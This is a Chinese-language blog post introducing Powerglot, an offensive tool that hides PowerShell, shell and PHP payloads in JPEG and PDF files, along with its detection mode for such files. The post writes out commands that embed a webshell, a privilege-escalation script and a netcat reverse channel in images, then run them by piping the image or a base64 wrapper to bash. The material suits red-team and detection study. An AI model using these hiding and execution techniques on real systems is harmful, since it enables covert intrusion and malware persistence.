Powerglot是什么工具

這篇文章給大家分享的是有關(guān)Powerglot是什么工具的內(nèi)容。小編覺(jué)得挺實(shí)用的，因此分享給大家做個(gè)參考，一起跟隨小編過(guò)來(lái)看看吧。

Powerglot

Powerglot是一款功能強(qiáng)大的攻擊性PowerShell腳本編碼工具，該工具基于Polyglots實(shí)現(xiàn)其功能。本質(zhì)上來(lái)說(shuō)，Powerglot是一款攻擊性安全工具，適用于惡意軟件、權(quán)限提升、橫向滲透和反向Shell等方向。

Powerglot可以使用Polyglots來(lái)對(duì)各種類型的腳本進(jìn)行編碼，比如說(shuō)攻擊性PowerShell腳本，而且還不需要加載器即可運(yùn)行Payload。

在紅隊(duì)演習(xí)或其他攻擊性任務(wù)中，Payload的偽裝/隱藏一般是通過(guò)隱寫(xiě)術(shù)來(lái)完成的，尤其是在躲避網(wǎng)絡(luò)層保護(hù)機(jī)制的時(shí)候，這也是PowerShell Payload腳本開(kāi)發(fā)中比較常見(jiàn)的技術(shù)。近期的一些惡意軟件和APT組織也都會(huì)選擇類似的方式來(lái)進(jìn)行攻擊，比如說(shuō)APT32、APT37、Ursnif、Powload、LightNeuron/Turla、Platinum APT、Waterbug/Turla、Lokibot、dukes（幽靈行動(dòng)）和Tianium等等。

Powerglot是一款基于Polyglots開(kāi)發(fā)的多功能跨平臺(tái)攻防工具，Powerglot允許開(kāi)發(fā)人員將腳本代碼（PowerShell、Shell腳本和PHP等）隱寫(xiě)在數(shù)字圖像中，目前該工具的開(kāi)發(fā)人員也正在添加新的文件格式支持。跟其他攻擊性工具或惡意軟件不同的是，Powerglot不需要任何加載器就可以執(zhí)行隱藏在目標(biāo)文件中的信息了，這樣可以將惡意程序在目標(biāo)系統(tǒng)上的噪聲降低到最小。

Powerglot在攻擊/滲透任務(wù)中有著明確的用途，但它也適用于藍(lán)隊(duì)研究人員。據(jù)我們所知，該工具是第一個(gè)通用且完全開(kāi)源的攻擊性編碼工具，它可以幫助廣大研究人員使用Polyglots來(lái)搜索隱藏信息，而這些信息可以幫助開(kāi)發(fā)人員在目標(biāo)系統(tǒng)中實(shí)現(xiàn)惡意軟件的隱藏或持久性感染。

功能介紹

• 將PowerShell、Shell腳本和PHP等代碼編碼進(jìn)圖像文件中，并且支持在不需要任何加載器的情況下來(lái)恢復(fù)/執(zhí)行隱藏的信息（Payload）。PowerGlot適用于多種文件格式，但是目前僅支持JPEG和PDF，其他格式支持目前正在開(kāi)發(fā)中。

• PowerGlot是一款完整開(kāi)源的工具，可以幫助研究人員檢測(cè)惡意代碼，特別是使用Truepolyglot 或stegoSploit等公共工具隱藏的信息結(jié)果。目前，開(kāi)發(fā)人員正在給PowerGlot添加JPEG、PNG、GIF、BMP、ZIP、PDF、MP3等格式的支持。

工具安裝

# git clone https://github.com/mindcrypt/powerglot

# python3 powerglot

工具使用&參數(shù)

下面給出的是如何使用Powerglot來(lái)隱藏Payload的一些演示樣例：

樣例一-將PowerShell/PHP/Shell腳本隱藏在一個(gè)JPEG圖像中：

# python3 powerglot.py -o payload.ps1 cat.jpg cat-hidden1.jpg

# python3 powerglot.py -o webshell.php cat.jpg cat-hidden2.jpg

# python3 powerglot.py -o shell.sh cat.jpg cat-hidden3.jpg

樣例二-將一個(gè)提權(quán)Shell腳本隱藏在一個(gè)JPEG圖像中：

# python3 powerglot.py -o linenum.sh cat.jpg cat-linenum.jpg

# file cat-linenum.jpg (It is a valid JPEG file)

# feh cat-lineum.jpg (The image is properly showed in an image viewer)

 

# We can execute the script in several ways:

 

    a) cat cat-linenum | bash

    b) chmod +x cat-linenum.jpeg; ./cat-linenum.jpeg

樣例三-將一個(gè)netcat反向信道隱藏在一個(gè)JPEG圖像中：

# Attacker

# echo "nc 127.0.0.1 4444" > netcat.sh

# python3 powerglot.py -o netcat.sh cat.jpeg cat-netcat.jpeg

# nc -nvlp 4444

 

#Victim

# chmod +x cat-netcat.jpg | ./cat-netcat.jpg

樣例四-PDF隱藏：

# Create b64.sh with your favourite payload

base64 Linenum.sh -w 0 > b64.sh

# Edit b64.sh

echo "code in b64.sh" | base64 -d | bash;

 

# python3 powerglot -o b64.sh sample.pdf test.pdf

# file test.pdf

# xpdf test.pdf

 

# Execute payload

# cat test.pdf | bash or chmod +x test.pdf; ./test.pdf

樣例五：

# python3 powerglot.py -o script.ps1 cat.jpeg cat-ps.jpeg

# file cat-ps.jpeg

# feh cat-ps.jpeg

 

# Execute payload (example)

# cat cat-ps.jpeg | pwsh

 

PS /home/alfonso/PowerGlot/POWERSHELL> get-process;<#hola <# mundo#>

 

 NPM(K)    PM(M)      WS(M)     CPU(s)      Id  SI ProcessName

 ------    -----      -----     ------      --  -- -----------

      0     0,00       2,70       0,00     830 829 (sd-pam)

      0     0,00       0,00       0,00      75   0 acpi_thermal_pm

      0     0,00       4,80       0,00    1217 854 agent

      0     0,00       1,70       0,00     748 748 agetty

      0     0,00      40,77       1,01    1198 854 applet.py

      0     0,00       6,29       0,00     938 938 at-spi-bus-launcher

      0     0,00       6,61       5,64     953 938 at-spi2-registryd

      0     0,00       0,00       0,00     131   0 ata_sff

      0     0,00       1,77       0,00    8906 …78 atom

      0     0,00     218,81     585,95    8908 …78 atom

      0     0,00     236,18     176,24    8947 …78 atom

      0     0,00     142,14       2,51    9009 …78 atom

      0     0,00      81,54       3,32    8932 …78 atom --type=gpu-process --enable-features=SharedArrayBuffer -…

      0     0,00      39,44       0,01    8910 …78 atom --type=zygote --no-sandbox

      0     0,00       5,62       0,11    1370 …70 bash

      0     0,00       5,36       0,66    5278 …78 bash

      0     0,00       6,34       1,48    6778 …78 bash

      0     0,00       0,00       0,00      68   0 blkcg_punt_bio

      0     0,00      46,73       2,20    1199 854 blueman-applet

      0     0,00      50,25       1,64    1301 854 blueman-tray

在文件系統(tǒng)中檢測(cè)隱藏代碼

#python3 powerglot.py -d ./

--= [Detecting polyglots] --=

..............................................................

[Suspicious file]-[ ./cat-end-extra2.jpg ]..

[Suspicious file]-[ ./cat-end-extra3.jpg ][Polyglot Stegosploit][EOF Signature: */ -->]

.................................................................................

[Suspicious file]-[ ./cat-end-extra1.jpg ]..

感謝各位的閱讀！關(guān)于“Powerglot是什么工具”這篇文章就分享到這里了，希望以上內(nèi)容可以對(duì)大家有一定的幫助，讓大家可以學(xué)到更多知識(shí)，如果覺(jué)得文章不錯(cuò)，可以把它分享出去讓更多的人看到吧！